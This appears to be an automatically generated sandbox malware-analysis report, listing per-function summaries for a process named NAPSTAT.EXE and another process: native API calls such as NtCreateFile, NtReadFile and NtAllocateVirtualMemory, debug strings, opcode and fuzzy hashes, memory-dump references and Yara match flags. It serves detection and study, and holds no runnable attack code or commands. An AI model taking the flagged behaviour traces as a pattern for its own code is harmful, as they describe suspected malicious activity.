                                                              0x00000000
                                                              0x008553d6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x008922b6
                                                              0x00000000
                                                              0x0089228f
                                                              0x00892349
                                                              0x0089234d
                                                              0x00892251
                                                              0x00892251
                                                              0x00000000
                                                              0x00892251
                                                              0x008921a4
                                                              0x008921a4
                                                              0x008921a6
                                                              0x008921a8
                                                              0x008921ac
                                                              0x008921b6
                                                              0x008921b8
                                                              0x008921bc
                                                              0x008921be
                                                              0x00000000
                                                              0x00000000
                                                              0x008921c0
                                                              0x008921c2
                                                              0x008921c4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x008921c4
                                                              0x008921c6
                                                              0x008921c6
                                                              0x008921c8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x008921c8
                                                              0x008921a2
                                                              0x00000000
                                                              0x00892183
                                                              0x0087057b
                                                              0x0087057d
                                                              0x00870581
                                                              0x00870583
                                                              0x00892178
                                                              0x00000000
                                                              0x00870589
                                                              0x0087058f
                                                              0x0087058f
                                                              0x00870583
                                                              0x00000000

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00892206
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-4236105082
                                                              • Opcode ID: 61a21af0b5e039e7c123fbb43b68132d305b1384417abffc73b2d681e60394bb
                                                              • Instruction ID: 56dc92d43517ac0a028e0961ab9cb61f52a97eb34ab41cd729412f2a03664be2
                                                              • Opcode Fuzzy Hash: 61a21af0b5e039e7c123fbb43b68132d305b1384417abffc73b2d681e60394bb
                                                              • Instruction Fuzzy Hash: E2512631B002117BEF14EA18CC81FA673A9FBD5720F258229FD58DB386DA65EC418BD1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 008714C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___swprintf_l.LIBCMT ref: 0089EA22
                                                                • Part of subcall function 008713CB: ___swprintf_l.LIBCMT ref: 0087146B
                                                                • Part of subcall function 008713CB: ___swprintf_l.LIBCMT ref: 00871490
                                                              • ___swprintf_l.LIBCMT ref: 0087156D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: 04e2358722e8fed1f7ff0814fd34dadefa03cfe9504b82762cd63ba4fc6622aa
                                                              • Instruction ID: c25cc53fdf43621d8c67a45cd31ec8c03b67676c8f0df0052e373198e3c74c1e
                                                              • Opcode Fuzzy Hash: 04e2358722e8fed1f7ff0814fd34dadefa03cfe9504b82762cd63ba4fc6622aa
                                                              • Instruction Fuzzy Hash: CC2193729002299BCF20EE5CCC45AEE77ACFB90704F488155FC4AD3644DB74DA588BE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 008553A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008922F4
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 00892328
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008922FC
                                                              • RTL: Resource at %p, xrefs: 0089230B
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-871070163
                                                              • Opcode ID: 0abc78300c4be6995335f9a58bb8c22b02564e64bedcebf2a0a98701dabe4bf2
                                                              • Instruction ID: 396a4e9749da694ccf1c3648433d2a1fbc8134ca73e512402085319660ed1888
                                                              • Opcode Fuzzy Hash: 0abc78300c4be6995335f9a58bb8c22b02564e64bedcebf2a0a98701dabe4bf2
                                                              • Instruction Fuzzy Hash: C85123716006017BDF11AB2CCC81FA673A8FF95764F104229FE08DB381EA65ED8587A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0085EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 008924FA
                                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0089248D
                                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 008924BD
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                              • API String ID: 0-3177188983
                                                              • Opcode ID: 395a7700d079e9aad92320f433286ab0c0ced36c04e547f32c2c47b7fa7b227d
                                                              • Instruction ID: f8fa71a8d9a8cd3d9729adef166f814569ac9de373cfd5cf69ebce59feef9ce1
                                                              • Opcode Fuzzy Hash: 395a7700d079e9aad92320f433286ab0c0ced36c04e547f32c2c47b7fa7b227d
                                                              • Instruction Fuzzy Hash: 0D41D570600204BBCB24EBA8CC85FAA77B9FF84720F248615F955DB3D1D634EA4187A6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0086FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: __fassign
                                                              • String ID:
                                                              • API String ID: 3965848254-0
                                                              • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                              • Instruction ID: bbac9315c8dd2886dee6cc1609e2a218eb78b6218bc5bc55127f3bea67a31ee4
                                                              • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                              • Instruction Fuzzy Hash: 0791CF71E0020AEBDF24DF58D8456AEBBB0FF55318F25807AD501EB263E7319A51CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Analysis Process: NAPSTAT.EXE PID: 2532 Parent PID: 1388 NAPSTAT.EXECOMMON

                                                              Executed Functions

                                                              Function 00099D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,00094B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00094B87,007A002E,00000000,00000060,00000000,00000000), ref: 00099DAD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID: .z`
                                                              • API String ID: 823142352-1441809116
                                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                              • Instruction ID: 63cb80dc364295cf340fb5e817a82d429ee0f25d7d9631c0e925bfb349143eeb
                                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                              • Instruction Fuzzy Hash: B8F0B2B2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00099E8A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtClose.NTDLL( M,?,?,00094D20,00000000,FFFFFFFF), ref: 00099EB5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID: M
                                                              • API String ID: 3535843008-4211545630
                                                              • Opcode ID: c217c08a7b348f6d53e9d0dc467461a31a3a6b028f15d24cb1350f2130b9f464
                                                              • Instruction ID: fd160611b0e891bcf935d961817024492ae80bc3afe83d6768a4cd34c8910cf6
                                                              • Opcode Fuzzy Hash: c217c08a7b348f6d53e9d0dc467461a31a3a6b028f15d24cb1350f2130b9f464
                                                              • Instruction Fuzzy Hash: F7E0C275200314BFDB10EBA8CC86EE77B9CEF44750F158598BA0CAB342D530F60186E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00099E90, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtClose.NTDLL( M,?,?,00094D20,00000000,FFFFFFFF), ref: 00099EB5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID: M
                                                              • API String ID: 3535843008-4211545630
                                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                              • Instruction ID: 38dda25029afe3172f76972a2fe7647abf86c968db1867b573677de5ec081c4c
                                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                              • Instruction Fuzzy Hash: 06D012752002146BD710EB98CC85ED7775CEF44750F154455BA585B242C530F50086E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00099E0A, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtReadFile.NTDLL(?,?,FFFFFFFF,00094A01,?,?,?,?,00094A01,FFFFFFFF,?,BM,?,00000000), ref: 00099E55
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: defadeeb5fe58df5af4db50e95d650c805e673c2155467967d3a3b37e481d00d
                                                              • Instruction ID: 87b67d1ee7225b32528b3762e799ce3c29026e7110b4cc27814d9a7271ab7fae
                                                              • Opcode Fuzzy Hash: defadeeb5fe58df5af4db50e95d650c805e673c2155467967d3a3b37e481d00d
                                                              • Instruction Fuzzy Hash: 29F0F9B6200109AFDB14CF99CC80DEB77A9EF8C714F058248BA5D97255C630E911CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00099E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtReadFile.NTDLL(?,?,FFFFFFFF,00094A01,?,?,?,?,00094A01,FFFFFFFF,?,BM,?,00000000), ref: 00099E55
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                              • Instruction ID: c1dbbdede6ca734d3b6ae3ff421215ba9194ca1b8af34a3d35a52b2938fa7461
                                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                              • Instruction Fuzzy Hash: 38F0A4B2200208ABCB14DF89DC81EEB77ADEF8C754F158248BA1DA7241D630E8118BA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00099F3F, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 00099F79
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: 2117cae25743e7b554237e854eecb7d047a3db3039c2a51f0108efda4a825054
                                                              • Instruction ID: 1f16ae43a5784853e5b41f12cdf5039f928b71eaae4bb22f5681293e20dbf3d1
                                                              • Opcode Fuzzy Hash: 2117cae25743e7b554237e854eecb7d047a3db3039c2a51f0108efda4a825054
                                                              • Instruction Fuzzy Hash: 01F015B2200218AFCB14DF98CC81EEB77A9FF88750F118248FE09A7241C630E811CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00099F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 00099F79
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                              • Instruction ID: 7f7d3c63fc8a91ffcb1dfd4a579ead8bd4f3f7c587b654bacbd3ae9f6f840db4
                                                              • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                              • Instruction Fuzzy Hash: 57F015B2200208ABCB14DF89CC81EEB77ADEF88750F118148BE08A7241C630F810CBE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A900C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                              • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                              • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                              • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A907AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                              • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                              • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                              • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A8F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                              • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                              • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                              • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A8F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                              • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                              • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                              • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A8FAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                              • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                              • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                              • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A8FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                              • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                              • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                              • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A8FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                              • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                              • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                              • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A8FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
